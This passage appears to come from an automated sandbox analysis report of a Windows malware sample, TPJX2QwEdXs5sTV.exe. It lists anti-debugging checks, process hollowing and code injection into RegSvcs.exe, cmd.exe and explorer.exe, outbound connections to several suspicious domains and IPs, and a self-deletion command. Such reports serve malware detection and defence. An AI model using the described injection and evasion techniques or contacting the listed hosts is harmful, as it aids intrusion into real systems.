          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0365FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035AE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035D36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0365FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03678ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035D16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03670EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03670EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03670EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_036246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0363FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035BAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035BAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035C7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035CB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035CB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03623540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035AB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035AB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035CC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035CC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035AC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03678D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0362A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035D513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035D513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035AAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035C4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_036341E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03658DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035BD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035BD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035CC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035D35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035C0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035C0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03671074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03662073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035C746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0363C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0363C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03661C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03626C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03626C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03626C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03626C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0367740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0367740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0367740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03674015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03674015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03627016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03627016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03627016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03626CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03626CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03626CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_036614FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03678CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0363B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0363B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0363B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0363B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0363B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0363B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03623884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03623884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeMemory allocated: page read and write | page guard
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_00886FE3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_00887310 SetUnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.ice-lemon.pro
          Source: C:\Windows\explorer.exeDomain query: www.indianadogeavaxsite.site
          Source: C:\Windows\explorer.exeDomain query: www.munortiete.com
          Source: C:\Windows\explorer.exeDomain query: www.pierrot-bros.com
          Source: C:\Windows\explorer.exeNetwork Connect: 54.194.41.141 80
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.147.111 80
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: 870000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 709008
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 3292
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 3292
          Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 3292
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
          Source: explorer.exe, 00000008.00000000.328066914.0000000001400000.00000002.00020000.sdmp, cmd.exe, 00000017.00000002.522213506.0000000005CA0000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
          Source: explorer.exe, 00000008.00000000.328066914.0000000001400000.00000002.00020000.sdmp, cmd.exe, 00000017.00000002.522213506.0000000005CA0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.328066914.0000000001400000.00000002.00020000.sdmp, cmd.exe, 00000017.00000002.522213506.0000000005CA0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000008.00000000.328066914.0000000001400000.00000002.00020000.sdmp, cmd.exe, 00000017.00000002.522213506.0000000005CA0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000008.00000000.284022944.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: ProgmanX
          Source: explorer.exe, 00000008.00000000.294727832.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndAj
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
